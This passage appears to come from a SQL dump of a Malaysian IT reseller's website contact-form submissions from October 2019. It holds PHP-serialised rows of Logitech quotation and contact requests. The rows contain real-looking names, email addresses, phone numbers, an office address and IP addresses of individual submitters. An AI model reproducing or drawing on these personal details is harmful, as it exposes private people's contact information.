items\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"45\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-10-11 14:30:23','183.171.111.138','1'),(334,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"Faiz Yaakob\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:32:\"nur.ahmad.faiz@worleyparsons.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"011-37031026\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"Ranhill WorleyParsons\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:47:\"Logitech Group, SMARTDOCK, MeetUp Expansion Mic\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-10-12 02:00:52','124.82.58.193','1'),(335,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"Matius Savari\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"matiussavari@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0102510607\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"Personal use\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:111:\"My monitor has some glitch and to be fixed as soon as possible. Besides Iâ€™m worried it going to cost me a lot\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-10-14 15:54:27','115.164.40.250','1'),(336,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"Shameer Shari\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"shameershari@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0162480840\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"Amtrust mobile solutions\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:130:\"No. 8, Suite 1-3, Level 1, Tower B, Lobby B, UOA Corporate Tower, Avenue 10 Bangsar South City, Jalan Kerinchi, 59200 Kuala Lumpur\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"Logitech PTZ Pro 2\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:49:\"I want but adapter only for this model. Thank you\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"23\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-10-15 12:35:02','121.123.176.34','1'),(337,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:44:\"Sharifah faridah Syed Ibrahim Al Jamalullail\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"gigfreda2017@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"+601128543424\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:4:\"GIAD\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"Mcity Ampang, Kuala Lumpur\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"Logitech MeetUp\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:28:\"Kindly quote us the product.\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"62\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-10-16 14:45:23','202.187.50.18','1'),(338,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:8:\"Jo Phang\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"jophang@amazonite.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"+60196914096\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"Amazonite Advertising\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:78:\"Hi, I would like to know the pricing for Dropbox Business Advance for 3 users.\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-10-17 10:41:40','175.140.249.168','1'),(339,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"Nazman Ahamat\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"firstuss@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0193833252\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"First USS Enterprise\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Rally\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"56\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-10-17 22:33:15','203.106.68.107','1'),(340,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"Masturah Binti Azaha\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"masturah@tdsb.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0139317404\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:27:\"Terengganu Dredging Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:164:\"To request quotation for : 1) Printer 2) fax machine 3) laminate machine 4) shredder 5) Binding machine 6) puncher 7) best laptop for company use max budget RM 3800\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-10-20 10:32:55','210.186.145.89','1'),(341,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"ELAINE Koh\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:25:\"elainekoh.novel@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0167888383\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"Novel DAPS\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech 